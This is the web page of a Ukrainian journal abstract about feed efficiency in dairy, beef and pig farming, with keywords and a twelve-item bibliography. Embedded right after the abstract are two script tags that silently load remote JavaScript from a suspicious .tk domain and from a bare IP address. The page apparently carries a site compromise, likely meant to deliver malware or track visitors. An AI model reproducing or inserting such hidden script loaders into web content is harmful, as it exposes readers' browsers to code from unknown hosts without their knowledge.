ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.131.5:636.085
Економіка агропромислового виробництва

Ефективність використання кормів у тваринництві / Рибаченко О. М. // Економіка АПК. - 2013. - № 12 - С. 25

Проаналізовано ефективність використання кормів у молочному й м’ясному скотарстві, свинарстві в сільськогосподарських підприємствах України, а також у дослідних господарствах Інституту кормів та сільського господарства Поділля НААН. Розраховано основні економічні показники, що визначають рівень використання кормів у тваринництві, зокрема, витрати кормів на одиницю продукції, продуктивність кормів, їхню окупність. Проведено кореляційно-регресійний і факторний аналіз показників ефективності використання кормів із метою виявлення резервів поліпшення фінансово-економічної ситуації у тваринництві. Одержана аналітична база дала можливість обґрунтувати основні тенденції у розвитку окремих галузей тваринництва з погляду кормомісткості відповідної продукції, раціональної годівлі, продуктивної дії кормів. Табл.: 6. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ефективність, продуктивність сільськогосподарських тварин, кормовиробництво, витрати кормів, регресійний аналіз, факторний аналіз, окупність кормів

Список використаних джерел

 1. Азізов С.П. Організація ефективного кормовиробництва – основа розвитку тваринництва / С.П. Азізов, Б.М. Батов ; за ред. С.П. Азізова. – К.: Інститут аграрної економіки УААН, 2002. – 194 с.
 2. Воронецька І.С. Визначення собівартості молока на основі енергетичної оцінки кормів / І.С. Воронецька, О.М. Рибаченко, А.В. Тучик // Економіка АПК. – 2013. - № 1. – С. 38-45.
 3. Калінчик М.В. Оптимізація раціонів годівлі корів як основний чинник конкурентоспроможності галузі молочного скотарства / М.В. Калінчик, І.М. Алексєєнко, К.О. Лисенко // Агросвіт. – 2005. – № 1. – С. 29– 33.
 4. Карпусь М.М. Довідник поживності кормів / М.М. Карпусь, С.І. Карпович, А.В. Малієнко та ін.; за ред. М.М. Карпуся. – 2-ге вид. перероб. і доп. – К.: Урожай, 1988. – 400 с.
 5. Косолапов В.М. Кормопроизводство – определяющий фактор сельского хозяйства России / В.М. Косолапов, И.А. Трофимов, Л.С. Трофимова, Е.П. Яковлева // Вестник Орловского ГАУ. – 2012. – № 1. – С. 29–32.
 6. Ларетин Н.А. Стратегия устойчивого развития кормопроизводства / Н.А Ларетин // АПК: экономика, управление. – 2011. – № 9. – С. 68-72.
 7. Нетрадиційна оцінка кормів і складання раціонів за продукцією молока / [Кулик М.Ф., Петриченко В.Ф., Скоромна О.І. та ін.] ; за ред. М.Ф. Кулика, В.Ф. Петриченка, О.І. Скоромної, Ю.В. Обертюха. – Вінниця: ПП «Вид-во «Теза», 2006. – 543 с.
 8. Сельманович В.Л. Кормопроизводство / В.Л. Сельманович. – Мн.: Новое знание, 2008. – С. 256.
 9. Misbahu Bashir. The problem of livestock production is feeding / Bashir Misbahu / http://www.dailytrust.info: 12 September 2013.
 10. Sleeter Bull. The Principles of Feeding Farm Animals / Bull Sleeter. – California: Macmillan, 2010. – 432 p.
 11. Paul C. Feeds and feed production / C. Paul. – Oxford: Blackwell Publishing, 2003. – 210 p.
 12. World feed panorama / WattAgNet (2009-01-05)/ http://www.wattagnet.com.
Читати статтю: 13_12_25-30.pdf